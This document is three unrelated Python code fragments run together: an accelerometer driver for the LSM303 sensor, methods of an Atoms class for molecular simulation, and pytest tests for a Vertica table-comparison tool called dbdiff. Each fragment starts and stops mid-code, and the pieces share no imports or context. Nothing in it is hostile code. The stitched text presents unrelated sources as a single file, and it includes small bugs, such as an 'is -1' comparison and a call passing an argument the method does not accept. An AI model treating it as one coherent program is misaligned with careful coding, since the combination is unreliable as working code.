_REG_ACCEL_FIFO_SRC_REG_A = const(0x2F)
_REG_ACCEL_INT1_CFG_A = const(0x30)
_REG_ACCEL_INT1_SOURCE_A = const(0x31)
_REG_ACCEL_INT1_THS_A = const(0x32)
_REG_ACCEL_INT1_DURATION_A = const(0x33)
_REG_ACCEL_INT2_CFG_A = const(0x34)
_REG_ACCEL_INT2_SOURCE_A = const(0x35)
_REG_ACCEL_INT2_THS_A = const(0x36)
_REG_ACCEL_INT2_DURATION_A = const(0x37)
_REG_ACCEL_CLICK_CFG_A = const(0x38)
_REG_ACCEL_CLICK_SRC_A = const(0x39)
_REG_ACCEL_CLICK_THS_A = const(0x3A)
_REG_ACCEL_TIME_LIMIT_A = const(0x3B)
_REG_ACCEL_TIME_LATENCY_A = const(0x3C)
_REG_ACCEL_TIME_WINDOW_A = const(0x3D)
_REG_ACCEL_ACT_THS_A = const(0x3E)
_REG_ACCEL_ACT_DUR_A = const(0x3F)
# note:: Tap related registers are called ``CLICK_`` in the datasheet
# Conversion constants
_LSM303ACCEL_MG_LSB = 16704.0 # magic!
_GRAVITY_STANDARD = 9.80665 # Earth's gravity in m/s^2
_SMOLLER_GRAVITY = 0.00980665
# pylint: disable=too-few-public-methods
class Rate:
"""Options for `data_rate`"""
RATE_SHUTDOWN = const(0)
RATE_1_HZ = const(1)
RATE_10_HZ = const(2)
RATE_25_HZ = const(3)
RATE_50_HZ = const(4)
RATE_100_HZ = const(5)
RATE_200_HZ = const(6)
RATE_400_HZ = const(7)
RATE_1620_HZ = const(8)
RATE_1344_HZ = const(9)
class Mode:
"""Options for `mode`"""
MODE_NORMAL = const(0)
MODE_HIGH_RESOLUTION = const(1)
MODE_LOW_POWER = const(2)
class Range:
"""Options for `range`"""
RANGE_2G = const(0)
RANGE_4G = const(1)
RANGE_8G = const(2)
RANGE_16G = const(3)
# pylint: enable=too-few-public-methods
class LSM303_Accel: # pylint:disable=too-many-instance-attributes
"""Driver for the LSM303's accelerometer.
:param ~busio.I2C i2c: The I2C bus the device is connected to.
**Quickstart: Importing and using the device**
Here is an example of using the :class:`LSM303_Accel` class.
First you will need to import the libraries to use the sensor
.. code-block:: python
import board
import adafruit_lsm303_accel
Once this is done you can define your `board.I2C` object and define your sensor object
.. code-block:: python
i2c = board.I2C() # uses board.SCL and board.SDA
sensor = adafruit_lsm303_accel.LSM303_Accel(i2c)
Now you have access to the :attr:`acceleration` attribute
.. code-block:: python
acc_x, acc_y, acc_z = sensor.acceleration
"""
# Class-level buffer for reading and writing data with the sensor.
# This reduces memory allocations but means the code is not re-entrant or
# thread safe!
_chip_id = UnaryStruct(_REG_ACCEL_WHO_AM_I, "B")
_int2_int1_enable = RWBit(_REG_ACCEL_CTRL_REG6_A, 6)
_int2_int2_enable = RWBit(_REG_ACCEL_CTRL_REG6_A, 5)
_int1_latching = RWBit(_REG_ACCEL_CTRL_REG5_A, 3)
_int2_latching = RWBit(_REG_ACCEL_CTRL_REG5_A, 1)
_bdu = RWBit(_REG_ACCEL_CTRL_REG4_A, 7)
_int2_activity_enable = RWBit(_REG_ACCEL_CTRL_REG6_A, 3)
_int_pin_active_low = RWBit(_REG_ACCEL_CTRL_REG6_A, 1)
_act_threshold = UnaryStruct(_REG_ACCEL_ACT_THS_A, "B")
_act_duration = UnaryStruct(_REG_ACCEL_ACT_DUR_A, "B")
_data_rate = RWBits(4, _REG_ACCEL_CTRL_REG1_A, 4)
_enable_xyz = RWBits(3, _REG_ACCEL_CTRL_REG1_A, 0)
_raw_accel_data = StructArray(_REG_ACCEL_OUT_X_L_A, "<h", 3)
_low_power = RWBit(_REG_ACCEL_CTRL_REG1_A, 3)
_high_resolution = RWBit(_REG_ACCEL_CTRL_REG4_A, 3)
_range = RWBits(2, _REG_ACCEL_CTRL_REG4_A, 4)
_int1_src = UnaryStruct(_REG_ACCEL_INT1_SOURCE_A, "B")
_tap_src = UnaryStruct(_REG_ACCEL_CLICK_SRC_A, "B")
_tap_interrupt_enable = RWBit(_REG_ACCEL_CTRL_REG3_A, 7, 1)
_tap_config = UnaryStruct(_REG_ACCEL_CLICK_CFG_A, "B")
_tap_interrupt_active = ROBit(_REG_ACCEL_CLICK_SRC_A, 6, 1)
_tap_threshold = UnaryStruct(_REG_ACCEL_CLICK_THS_A, "B")
_tap_time_limit = UnaryStruct(_REG_ACCEL_TIME_LIMIT_A, "B")
_tap_time_latency = UnaryStruct(_REG_ACCEL_TIME_LATENCY_A, "B")
_tap_time_window = UnaryStruct(_REG_ACCEL_TIME_WINDOW_A, "B")
_BUFFER = bytearray(6)
def __init__(self, i2c):
self._accel_device = I2CDevice(i2c, _ADDRESS_ACCEL)
self.i2c_device = self._accel_device
self._data_rate = 2
self._enable_xyz = 0b111
self._int1_latching = True
self._int2_latching = True
self._bdu = True
# self._write_register_byte(_REG_CTRL5, 0x80)
# time.sleep(0.01) # takes 5ms
self._cached_mode = 0
self._cached_range = 0
def set_tap(
self,
tap,
threshold,
*,
time_limit=10,
time_latency=20,
time_window=255,
tap_cfg=None
):
"""
The tap detection parameters.
:param int tap: 0 to disable tap detection, 1 to detect only single taps, and 2 to detect \
only double taps.
:param int threshold: A threshold for the tap detection. The higher the value the less\
sensitive the detection. This changes based on the accelerometer range. Good values\
are 5-10 for 16G, 10-20 for 8G, 20-40 for 4G, and 40-80 for 2G.
:param int time_limit: TIME_LIMIT register value. Defaults to :const:`10`
:param int time_latency: TIME_LATENCY register value. Defaults to :const:`20`
:param int time_window: TIME_WINDOW register value. Defaults to :const:`255`
:param int tap_cfg: CLICK_CFG register value. Defaults to `None`
"""
if (tap < 0 or tap > 2) and tap_cfg is None:
raise ValueError(
"Tap must be 0 (disabled), 1 (single tap), or 2 (double tap)!"
)
if threshold > 127 or threshold < 0:
raise ValueError("Threshold out of range (0-127)")
if tap == 0 and tap_cfg is None:
# Disable click interrupt.
self._tap_interrupt_enable = False
self._tap_config = 0
return
self._tap_interrupt_enable = True
if tap_cfg is None:
if tap == 1:
tap_cfg = 0x15 # Turn on all axes & singletap.
if tap == 2:
tap_cfg = 0x2A # Turn on all axes & doubletap.
# Or, if a custom tap configuration register value specified, use it.
self._tap_config = tap_cfg
self._tap_threshold = threshold # why and?
self._tap_time_limit = time_limit
self._tap_time_latency = time_latency
self._tap_time_window = time_window
@property
def tapped(self):
"""
True if a tap was detected recently. Whether its a single tap or double tap is
determined by the tap param on :meth:`set_tap`. :attr:`tapped` may be True over
multiple reads even if only a single tap or single double tap occurred.
"""
tap_src = self._tap_src
return tap_src & 0b1000000 > 0
@property
def _raw_acceleration(self):
self._read_bytes(
self._accel_device, _REG_ACCEL_OUT_X_L_A | 0x80, 6, self._BUFFER
)
return struct.unpack_from("<hhh", self._BUFFER[0:6])
@property
def acceleration(self):
"""The measured accelerometer sensor values.
A 3-tuple of X, Y, Z axis values in m/s^2 squared that are signed floats.
"""
raw_accel_data = self._raw_acceleration
x = self._scale_data(raw_accel_data[0])
y = self._scale_data(raw_accel_data[1])
z = self._scale_data(raw_accel_data[2])
return (x, y, z)
def _scale_data(self, raw_measurement):
lsb, shift = self._lsb_shift()
return (raw_measurement >> shift) * lsb * _SMOLLER_GRAVITY
def _lsb_shift(self): # pylint:disable=too-many-branches
# the bit depth of the data depends on the mode, and the lsb value
# depends on the mode and range
lsb = -1 # the default, normal mode @ 2G
if self._cached_mode is Mode.MODE_HIGH_RESOLUTION: # 12-bit
shift = 4
if self._cached_range is Range.RANGE_2G:
lsb = 0.98
elif self._cached_range is Range.RANGE_4G:
lsb = 1.95
elif self._cached_range is Range.RANGE_8G:
lsb = 3.9
elif self._cached_range is Range.RANGE_16G:
lsb = 11.72
elif self._cached_mode is Mode.MODE_NORMAL: # 10-bit
shift = 6
if self._cached_range is Range.RANGE_2G:
lsb = 3.9
elif self._cached_range is Range.RANGE_4G:
lsb = 7.82
elif self._cached_range is Range.RANGE_8G:
lsb = 15.63
elif self._cached_range is Range.RANGE_16G:
lsb = 46.9
elif self._cached_mode is Mode.MODE_LOW_POWER: # 8-bit
shift = 8
if self._cached_range is Range.RANGE_2G:
lsb = 15.63
elif self._cached_range is Range.RANGE_4G:
lsb = 31.26
elif self._cached_range is Range.RANGE_8G:
lsb = 62.52
elif self._cached_range is Range.RANGE_16G:
lsb = 187.58
if lsb is -1:
raise AttributeError(
"'impossible' range or mode detected: range: %d mode: %d"
% (self._cached_range, self._cached_mode)
)
return (lsb, shift)
@property
def data_rate(self):
"""Select the rate at which the sensor takes measurements. Must be a `Rate`"""
return self._data_rate
@data_rate.setter
def data_rate(self, value):
if value < 0 or value > 9:
raise AttributeError("data_rate must be a `Rate`")
self._data_rate = value
@property
def range(self):
"""Adjusts the range of values that the sensor can measure, from +- 2G to +-16G
Note that larger ranges will be less accurate. Must be a `Range`"""
return self._cached_range
@range.setter
def range(self, value):
if value < 0 or value > 3:
raise AttributeError("range must be a `Range`")
self._range = value
self._cached_range = value
@property
def mode(self):
"""Sets the power mode of the sensor. The mode must be a `Mode`. Note that the
mode and range will both affect the accuracy of the sensor"""
return self._cached_mode
@mode.setter
def mode(self, value):
if value < 0 or value > 2:
raise AttributeError("mode must be a `Mode`")
self._high_resolution = value & 0b01
self._low_power = (value & 0b10) >> 1
self._cached_mode = value
def _read_u8(self, device, address):
with device as i2c:
self._BUFFER[0] = address & 0xFF
i2c.write_then_readinto(self._BUFFER, self._BUFFER, out_end=1, in_end=1)
return self._BUFFER[0]
def _write_u8(self, device, address, val):
with device as i2c:
self._BUFFER[0] = address & 0xFF
self._BUFFER[1] = val & 0xFF
i2c.write(self._BUFFER, end=2)
@staticmethod
def _read_bytes(device, address, count, buf):
with device as i2c:
| |
classification.
"""
if molecule not in self.molecules:
raise KeyError("molecule not in system")
self.molecules.remove(molecule)
for bond in molecule.bonds:
self.bonds.remove(bond)
for angle in molecule.angles:
self.angles.remove(angle)
for dihedral in molecule.dihedrals:
self.dihedrals.remove(dihedral)
for improper in molecule.impropers:
self.impropers.remove(improper)
for atom in molecule.atoms:
self.atoms.remove(atom)
if pool_top_types:
self.pool_topological_types()
def clear_cell(self):
self._cell = None
def disp_attrs(self):
for key in self.__dict__:
print("{}: {}".format(key, self.__dict__[key]))
def count(self, atom_type):
pass # in the future maybe
def add_atom(self, atom: Atom):
"""
Adds an Atom object to this Atoms object's atom list.
Includes its type in atom_types list, if it's not already in it.
Parameters
----------
atom : Atom
Atom to be added.
"""
if isinstance(atom, Atom):
self.atoms.append(atom)
if atom.type not in self.atom_types:
self.atom_types.append(atom.type)
else:
raise TypeError("atom must be type Atom, got "
"{}".format(type(atom)))
def add_atoms(self, atoms):
"""
Given another Atoms object, adds each Atom in it to this Atoms object.
Includes their types in atom_types list, if they're not already in it.
Parameters
----------
atoms : Atoms
Atoms object whose atoms are to be added.
"""
if isinstance(atoms, Atoms):
for atom in atoms.atoms:
self.add_atom(atom)
else:
raise TypeError("atoms must be type Atoms, got "
"{}".format(type(atoms)))
def translate(self, vector):
"""Translates (moves) every atom by the given vector."""
for atom in self.atoms:
atom.translate(vector)
def rotate(self, angle: float, axis: str):
"""
Rotates all atoms around one axis going through the origin.
Parameters
----------
angle : float
Angle (in degrees) of rotation.
axis : str
Axis to rotate around: 'x', 'y' or 'z'.
"""
for atom in self.atoms:
atom.rotate(angle, axis)
def geometric_center(self):
"""Returns the geometric center of all atoms."""
geometric_center = np.array([0.0, 0.0, 0.0])
for atom in self.atoms:
geometric_center += atom.position
geometric_center /= len(self.atoms)
return geometric_center
def rotate_around_self(self, angle: float, axis: str):
"""
Rotates all atoms around one axis going through their geometric center.
Parameters
----------
angle : float
Angle (in degrees) of rotation.
axis : str
Axis to rotate around: 'x', 'y' or 'z'.
"""
geometric_center = self.geometric_center()
for atom in self.atoms:
atom.position -= geometric_center
self.rotate(angle, axis)
for atom in self.atoms:
atom.position += geometric_center
def translate_to_zero(self):
"""Translates the system so its geometric center is at the origin."""
self.translate(-1 * self.geometric_center())
def translate_to_cell_center(self):
"""Translates (moves) the system so its geometric center is at the
center of the cell."""
if self.cell is None:
raise NameError("cell not defined")
else:
self.translate_to_zero()
cell_center = (self.cell[0] + self.cell[1] + self.cell[2]) / 2
self.translate(cell_center)
def extended(self, nx, ny, nz, topology=False):
"""
Extends the system, copying the existing atoms as many times as needed.
Returns new object, does NOT change self.
Parameters
----------
nx, ny, nz : int
How many times the system shall be extended in x, y and z.
topology : bool, optional
If topology is to be extended as well. Standard is False.
Returns
-------
extended : Atoms
New Atoms object, extended from the original.
Notes
-----
Meant for orthogonal boxes. Be careful when using triclinic systems.
Does NOT compute topology internally, only extends the existing stuff.
"""
this = self.copy(topology=topology)
# in x
original_0 = this.copy(topology=topology)
for _ in range(nx - 1):
original_0.translate([self.cell[0][0], 0, 0])
original_0_copy = original_0.copy(topology=topology)
this = this + original_0_copy
# in y
original_1 = this.copy(topology=topology)
for _ in range(ny - 1):
original_1.translate([0, self.cell[1][1], 0])
original_1_copy = original_1.copy(topology=topology)
this = this + original_1_copy
# in z
original_2 = this.copy(topology=topology)
for _ in range(nz - 1):
original_2.translate([0, 0, self.cell[2][2]])
original_2_copy = original_2.copy(topology=topology)
this = this + original_2_copy
this.cell = [[nx * self.cell[0][0], 0, 0],
[0, ny * self.cell[1][1], 0],
[0, 0, nz * self.cell[2][2]]]
extended = this
return extended
def filled(self, molecule_xyz_path, gap=4.0,
centralize=False, topology=True, impropers=True,
centralize_molecule=False, bulk_path=None):
# honestly, PackMol does a much better job than this method
"""
Fills the system's cell with a molecule, avoiding superposition.
Returns new object, does not change self.
Parameters
----------
molecule_xyz_path : str
Path to the molecule's xyz file.
gap : float, optional
Minimal distance between every atom in the system and every atom
in the molecule, in angstroms. Standard is 4.0.
centralize : bool, optional
If the atoms in the system are to be translated to the cell center
before filling up. Standard is False.
topology : bool, optional
If topology is to be computed for the molecule. If True, the whole
molecule is removed if any atom in it superposes with the system
(by less than the given gap). Standard is True.
impropers : bool, optional
If improper dihedrals are to be included in the topology.
Standard is True.
centralize_molecule : bool, optional
If the molecule's atoms are to be centralized in its cell before
filling the system with it. If True, its xyz file should have a
Lattice. Standard is False.
bulk_path : str, optional
If given, is the path where an xyz file will be written with the
molecule extended (before superposing atoms are removed).
Returns
-------
filled : Atoms
New Atoms object, with the original atoms plus filling molecules.
Notes
-----
Meant to be used with orthogonal cells.
"""
if self.cell is None:
raise NameError("cell not defined")
if centralize:
self.translate_to_cell_center()
from files.xyz import Xyz
molecule_xyz = Xyz(molecule_xyz_path)
if molecule_xyz.atoms.cell is None:
raise NameError("cell in molecule xyz file not defined")
if centralize_molecule:
molecule_xyz.atoms.translate_to_cell_center()
n_molecules_in_x = math.floor(self.cell[0][0] /
molecule_xyz.atoms.cell[0][0])
n_molecules_in_y = math.floor(self.cell[1][1] /
molecule_xyz.atoms.cell[1][1])
n_molecules_in_z = math.floor(self.cell[2][2] /
molecule_xyz.atoms.cell[2][2])
print("Extending molecule {}*{}*{} times...".format(
n_molecules_in_x, n_molecules_in_y, n_molecules_in_z))
if topology:
molecule_xyz.atoms.compute_topology(impropers=impropers)
bulk = molecule_xyz.atoms.extended(n_molecules_in_x, n_molecules_in_y,
n_molecules_in_z, topology=topology,
impropers=impropers)
print("Molecule extended")
if bulk_path is not None:
bulk.write_xyz(bulk_path)
n_total_bulk = len(bulk)
gap_squared = gap ** 2
molecules_to_be_removed = []
atoms_to_be_removed = [] # just for optimizing
print("Checking {}*{} pairs for contact...".format(len(bulk.atoms),
len(self.atoms)))
for filling_atom in bulk.atoms:
if filling_atom in atoms_to_be_removed:
continue
for standing_atom in self.atoms:
distance_squared = np.sum((filling_atom.position -
standing_atom.position) ** 2)
if distance_squared <= gap_squared:
if filling_atom.molecule not in molecules_to_be_removed:
molecules_to_be_removed.append(filling_atom.molecule)
for atom in filling_atom.molecule.atoms:
atoms_to_be_removed.append(atom)
break
print("All pairs checked")
for molecule in molecules_to_be_removed:
bulk.remove_molecule(molecule, pool_top_types=False)
print("{}/{} atoms removed".format(n_total_bulk - len(bulk),
n_total_bulk))
filled = self + bulk
filled.cell = self.cell
if topology:
filled.pool_topological_types()
return filled
def sort_atoms_by_type(self): # alphabetical
def return_atom_type(atom: Atom):
return str(atom.type)
self.atoms.sort(key=return_atom_type)
def sort_atoms_by_index(self):
def return_atom_index(atom: Atom):
return atom.index
self.atoms.sort(key=return_atom_index)
def read_xyz(self, filename):
"""
Reads atom types and atomic positions from given xyz file,
as well as Lattice parameters, if there are any (one may
use Ovito for editing an xyz file and giving it a lattice).
Erases current atoms in the Atoms object.
Parameters
----------
filename : str
Path to the xyz file.
"""
# makes a dummy Xyz object
from files.xyz import Xyz
xyz = Xyz(filename)
xyz.read_xyz()
if self.atoms:
print("WARNING: erasing current {} "
"atoms...".format(len(self.atoms)))
print("Reading {} atoms from xyz file...".format(len(self.atoms)))
self.atoms = xyz.atoms.atoms
if xyz.atoms.cell is not None:
self._cell = xyz.atoms.cell
def write_xyz(self, filename, with_classification=False):
"""
Writes xyz file with atom species and atomic positions,
as well as cell parameters (Lattice) if there are any.
Parameters
----------
filename : str
Path to the xyz file to be written.
with_classification : bool, optional
If atom classification is wanted as a comment after every line.
Standard is False.
"""
# makes a dummy Xyz object
from files.xyz import Xyz
xyz = Xyz()
xyz.atoms.atoms = self.atoms
if self.cell is not None:
xyz.atoms.cell = self.cell
xyz.write_xyz(filename, with_classification=with_classification)
def distance_vector(self, n1, n2):
"""
Gets the vector distance between two atoms, from atom n1 to atom n2,
i.e. position2 minus position1. (Starts counting atoms at 1, not 0.)
Parameters
----------
n1, n2 : int
Numbers of the first and second atoms, resp.
Returns
-------
dist : numpy.array
Distance vector from atom n1 to atom n2.
"""
n1 -= 1
n2 -= 1
dist = self.atoms[n2].position - self.atoms[n1].position
return dist
def distance_scalar(self, n1, n2):
"""
Gets the scalar distance between two atoms.
(Starts counting atoms at 1, not 0.)
Parameters
----------
n1, n2 : int
Numbers of the two atoms.
Returns
-------
dist : float
Scalar distance between the two atoms.
"""
distance_vector = self.distance_vector(n1, n2)
dist = np.sqrt(np.sum(distance_vector ** 2))
| |
<filename>tests/test_dbdiff.py
import logging
import os
from pathlib import Path
import pandas as pd
import pytest
from click.testing import CliRunner
from dbdiff.main import check_primary_key
from dbdiff.main import create_diff_table
from dbdiff.main import create_joined_table
from dbdiff.main import get_column_diffs
from dbdiff.main import get_diff_columns
from dbdiff.main import get_diff_rows
from dbdiff.main import get_unmatched_rows
from dbdiff.main import get_unmatched_rows_straight
from dbdiff.main import insert_diff_table
from dbdiff.main import select_distinct_rows
from dbdiff.cli import cli
from dbdiff.vertica import get_column_info
from dbdiff.vertica import get_column_info_lookup
from dbdiff.vertica import get_cur
from dbdiff.vertica import get_table_exists
logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.INFO)
VALID_COL = {'comparable': True, 'exclude': False}
INT_DTYPES = {d: 'int' for d in {'x_dtype', 'y_dtype'}}
VARCHAR_DTYPES = {d: 'varchar(10)' for d in {'x_dtype', 'y_dtype'}}
DATE_DTYPES = {d: 'date' for d in {'x_dtype', 'y_dtype'}}
COMPARE_COLS = pd.DataFrame({'data1': {**INT_DTYPES, **VALID_COL},
'data2': {**INT_DTYPES, **VALID_COL},
'data3': {**DATE_DTYPES, **VALID_COL},
'data4': {**VARCHAR_DTYPES, **VALID_COL},}).transpose()
JOIN_COLS = pd.DataFrame({'join1': {**VARCHAR_DTYPES, **VALID_COL},
'join2': {**VARCHAR_DTYPES, **VALID_COL}}).transpose()
@pytest.fixture(scope='session')
def cur():
# vsql -d docker -u dbadmin
# export VERTICA_HOST="localhost"
# export VERTICA_PORT="5433"
# export VERTICA_DATABASE="docker"
# export VERTICA_USERNAME="dbadmin"
# export VERTICA_PASSWORD=""
os.environ['VERTICA_HOST'] = 'localhost'
os.environ['VERTICA_PORT'] = '5433'
os.environ['VERTICA_DATABASE'] = 'VMart'
os.environ['VERTICA_USERNAME'] = 'dbadmin'
os.environ['VERTICA_PASSWORD'] = ''
with get_cur() as c:
yield c
def create_schema(cur):
cur.execute('CREATE SCHEMA dbdiff;')
def create_x_table(cur):
cur.execute('CREATE TABLE dbdiff.x_table ( join1 varchar(10), join2 varchar(10), missingx int, missingx2 int, dtypemiss int, data1 int, data2 int, data3 date, data4 varchar(10));')
cur.execute("INSERT INTO dbdiff.x_table ( join1, join2, missingx, missingx2, dtypemiss, data1, data2, data3, data4) (select 'match1', 'matchdup21', 0, 0, 0, 0, 0, '2017-10-11', '');")
cur.execute("INSERT INTO dbdiff.x_table ( join1, join2, missingx, missingx2, dtypemiss, data1, data2, data3, data4) (select 'match1', 'match22', 0, 0, 0, 0, 0, '2017-10-11', 'a');")
cur.execute("INSERT INTO dbdiff.x_table ( join1, join2, missingx, missingx2, dtypemiss, data1, data2, data3, data4) (select 'match1', 'match23', 0, 0, 0, 1, 1, '2017-10-11', '');")
cur.execute("INSERT INTO dbdiff.x_table ( join1, join2, missingx, missingx2, dtypemiss, data1, data2, data3, data4) (select 'match1', 'missx21', null, null, null, null, null, null, '');")
cur.execute("INSERT INTO dbdiff.x_table ( join1, join2, missingx, missingx2, dtypemiss, data1, data2, data3, data4) (select 'match1', 'missx22', null, null, null, null, null, null, '');")
cur.execute("INSERT INTO dbdiff.x_table ( join1, join2, missingx, missingx2, dtypemiss, data1, data2, data3, data4) (select 'missx11', null, null, null, null, null, null, null, '');")
cur.execute("INSERT INTO dbdiff.x_table ( join1, join2, missingx, missingx2, dtypemiss, data1, data2, data3, data4) (select 'missx12', null, null, null, null, null, null, null, '');")
cur.execute("INSERT INTO dbdiff.x_table ( join1, join2, missingx, missingx2, dtypemiss, data1, data2, data3, data4) (select null, null, null, null, null, null, null, null, '');")
cur.execute('COMMIT;')
def create_y_table(cur, case_off: bool = False):
cur.execute('CREATE TABLE dbdiff.y_table ( join1 varchar(10), join2 varchar(10), missingy int, dtypemiss date, data1 int, data2 int, data3 date, data4 varchar(10));')
cur.execute("INSERT INTO dbdiff.y_table ( join1, join2, missingy, dtypemiss, data1, data2, data3, data4) (select 'match1', 'matchdup21', 0, '2019-04-22', 0, 0, '2017-10-11', '');")
cur.execute("INSERT INTO dbdiff.y_table ( join1, join2, missingy, dtypemiss, data1, data2, data3, data4) (select 'match1', 'matchdup21', 0, '2019-04-22', 0, 0, '2017-10-11', '');")
if case_off:
# here, we'll uppercase the 'A' so that these don't match
cur.execute("INSERT INTO dbdiff.y_table ( join1, join2, missingy, dtypemiss, data1, data2, data3, data4) (select 'match1', 'match22', 0, '2019-04-22', 0, 1, '2017-10-12', 'A');")
else:
cur.execute("INSERT INTO dbdiff.y_table ( join1, join2, missingy, dtypemiss, data1, data2, data3, data4) (select 'match1', 'match22', 0, '2019-04-22', 0, 1, '2017-10-12', 'a');")
cur.execute("INSERT INTO dbdiff.y_table ( join1, join2, missingy, dtypemiss, data1, data2, data3, data4) (select 'match1', 'match23', 0, '2019-04-22', 0, 0, '2017-10-13', '');")
cur.execute("INSERT INTO dbdiff.y_table ( join1, join2, missingy, dtypemiss, data1, data2, data3, data4) (select 'match1', 'missy21', 0, '2019-04-22', 0, 0, null, '');")
cur.execute("INSERT INTO dbdiff.y_table ( join1, join2, missingy, dtypemiss, data1, data2, data3, data4) (select 'missy11', null, 0, '2019-04-22', 0, 0, null, '');")
cur.execute('COMMIT;')
def drop_schema(cur):
cur.execute('DROP SCHEMA IF EXISTS dbdiff CASCADE;')
def test_drop_data_start(cur):
drop_schema(cur)
def test_create_data(cur):
create_schema(cur)
create_x_table(cur)
create_y_table(cur)
def test_get_column_info(cur):
column_info = get_column_info(cur, 'dbdiff', 'x_table')
assert type(column_info) == pd.DataFrame
assert 'column_name' in column_info.columns
assert 'data_type' in column_info.columns
def test_get_column_info_lookup(cur):
column_info_lookup = get_column_info_lookup(cur, 'dbdiff', 'x_table')
assert 'data1' in column_info_lookup
assert column_info_lookup['join1'].lower() == 'varchar(10)'
assert column_info_lookup['data1'] == 'int'
assert column_info_lookup['data2'] == 'int'
assert column_info_lookup['data3'] == 'date'
assert len(column_info_lookup) == 9
def test_get_table_exists(cur):
assert get_table_exists(cur, 'dbdiff', 'x_table')
assert get_table_exists(cur, 'dbdiff', 'y_table')
assert not get_table_exists(cur, 'dbdiff', 'z_table')
def test_check_primary_key(cur):
assert (
check_primary_key(
cur,
'dbdiff',
'x_table',
['join1', 'join2']
) == 0
)
assert check_primary_key(cur, 'dbdiff', 'x_table', ['join1']) == 4
def test_select_distinct_rows(cur):
x_table_rows = 8
x_table_columns = 9
for use_temp_tables in {True, False}:
new_table_schema, new_table_name = select_distinct_rows(cur, 'dbdiff', 'x_table', ['join1'])
# check that new table gets create with N rows
assert get_table_exists(cur, new_table_schema, 'x_table_dup')
assert get_table_exists(cur, new_table_schema, 'x_table_dedup')
cur.execute('select * from {schema}.{table}'.format(
schema=new_table_schema,
table=new_table_name)
)
dedup = pd.DataFrame(cur.fetchall())
assert dedup.shape[0] == 3
assert dedup.shape[1] == x_table_columns
cur.execute('select * from {schema}.{table}'.format(
schema=new_table_schema,
table='x_table_dup')
)
dup = pd.DataFrame(cur.fetchall())
assert dup.shape[0] == (x_table_rows - dedup.shape[0])
assert dup.shape[1] == (x_table_columns + 1)
def test_create_joined_table(cur):
create_joined_table(
cur,
x_schema='dbdiff',
y_schema='dbdiff',
x_table='x_table',
y_table='y_table',
join_cols=['join1', 'join2'],
compare_cols=pd.concat([COMPARE_COLS, JOIN_COLS]),
joined_schema='dbdiff',
joined_table='x_table_JOINED'
)
# check that it is created and has the right number of rows, columns...
assert get_table_exists(cur, 'dbdiff', 'x_table_JOINED')
cur.execute(
'select * from {schema}.{table}'.format(
schema='dbdiff',
table='x_table_JOINED'
)
)
df = pd.DataFrame(cur.fetchall())
assert df.shape[0] == 4
# double the comparing columns (x_* and y_*), and pk/join columns:
assert df.shape[1] == ((COMPARE_COLS.shape[0] * 2) + JOIN_COLS.shape[0])
def test_get_unmatched_rows_straight(cur):
join_cols = ['join1', 'join2']
# these are a bit flipped:
# the missing_x_join are counts for rows in y that are missing in x
# and the missing_y_join are counts for rows *in x* that are *not in y*
# the name coming from the *not in y* part of it.
y_minus_x = [2, 1] # formerly, "missing_x_join", now using set notation
x_minus_y = [3, 2] # etc
results = get_unmatched_rows_straight(
cur,
'dbdiff',
'dbdiff',
'x_table',
'y_table',
join_cols,
100
)
expected_results = {
'x': {
'count': sum(x_minus_y),
'sample_shape': (sum(x_minus_y), len(join_cols))
},
'y': {
'count': sum(y_minus_x),
'sample_shape': (sum(y_minus_x), len(join_cols))
}
}
print(results)
print(expected_results)
assert results['x']['count'] == expected_results['x']['count']
assert results['x']['sample'].shape[0] == expected_results['x']['sample_shape'][0]
assert results['x']['sample'].shape[1] == expected_results['x']['sample_shape'][1]
assert results['y']['count'] == expected_results['y']['count']
assert results['y']['sample'].shape[0] == expected_results['y']['sample_shape'][0]
assert results['y']['sample'].shape[1] == expected_results['y']['sample_shape'][1]
def test_get_unmatched_rows(cur):
join_cols = ['join1', 'join2']
# these are, again, a litte wierd. see note in test_get_unmatched_rows_straight()
y_minus_x = [2, 1]
x_minus_y = [3, 2]
results = get_unmatched_rows(
cur,
'dbdiff',
'dbdiff',
'x_table',
'y_table',
join_cols,
100
)
expected_results = {
j: {
side: {
'count': d[i],
'sample_shape': (d[i], i + 1)
} for side, d in {
'x': x_minus_y,
'y': y_minus_x
}.items()
} for i, j in enumerate(join_cols)
}
for col, expected in expected_results.items():
logging.info(col)
for side, expected_info in expected.items():
logging.info(side)
logging.info(results[col][side]['count'])
logging.info(results[col][side]['sample'])
assert 'sample' in results[col][side]
assert 'query' in results[col][side]
assert results[col][side]['count'] == expected_info['count']
for i in {0, 1}:
assert results[col][side]['sample'].shape[i] == expected_info['sample_shape'][i]
if col == 'join2':
assert 'sample_grouped' in results[col][side]
assert 'query_grouped' in results[col][side]
def test_create_diff_table(cur):
create_diff_table(cur, 'dbdiff', 'x_table_DIFF', ['join1', 'join2'],
pd.concat([COMPARE_COLS, JOIN_COLS]))
assert get_table_exists(cur, 'dbdiff', 'x_table_DIFF')
def test_insert_diff_table(cur):
cur.execute('select * from dbdiff.x_table_JOINED')
logging.info(cur.fetchall())
cur.execute('select * from dbdiff.x_table_DIFF')
logging.info(cur.fetchall())
insert_diff_table(
cur,
joined_schema='dbdiff',
joined_table='x_table_JOINED',
diff_schema='dbdiff',
diff_table='x_table_DIFF',
join_cols=['join1', 'join2'],
column='data1'
)
cur.execute('select * from {schema}.{table}'.format(schema='dbdiff', table='x_table_DIFF'))
df = pd.DataFrame(cur.fetchall())
assert df.shape[0] == 1
assert df.shape[1] == 3
insert_diff_table(
cur,
joined_schema='dbdiff',
joined_table='x_table_JOINED',
diff_schema='dbdiff',
diff_table='x_table_DIFF',
join_cols=['join1', 'join2'],
column='data2'
)
cur.execute('select * from {schema}.{table}'.format(schema='dbdiff', table='x_table_DIFF'))
df = pd.DataFrame(cur.fetchall())
assert df.shape[0] == 3
assert df.shape[1] == 3
# def test_implicit_dytpe_comparison():
# implicit_dytpe_comparison(x_dtype, y_dtype)
def test_get_diff_rows(cur):
diff_summary = get_diff_rows(
cur,
'dbdiff',
'x_table',
['join1', 'join2'],
100
)
assert diff_summary['count'] == 2
assert diff_summary['total_count'] == 3
assert diff_summary['sample'].shape[0] == 2
# assert diff_summary['sample'].shape[1] == 10
def test_get_diff_columns(cur):
df = get_diff_columns(cur, 'dbdiff', 'x_table')
assert df.shape[0] == 2
assert df.shape[1] == 2
def test_get_column_diffs(cur):
join_cols = ['join1', 'join2']
diff_columns = get_diff_columns(cur, 'dbdiff', 'x_table')
grouped_column_diffs = get_column_diffs(
diff_columns, cur,
'dbdiff',
'dbdiff',
'x_table',
'dbdiff',
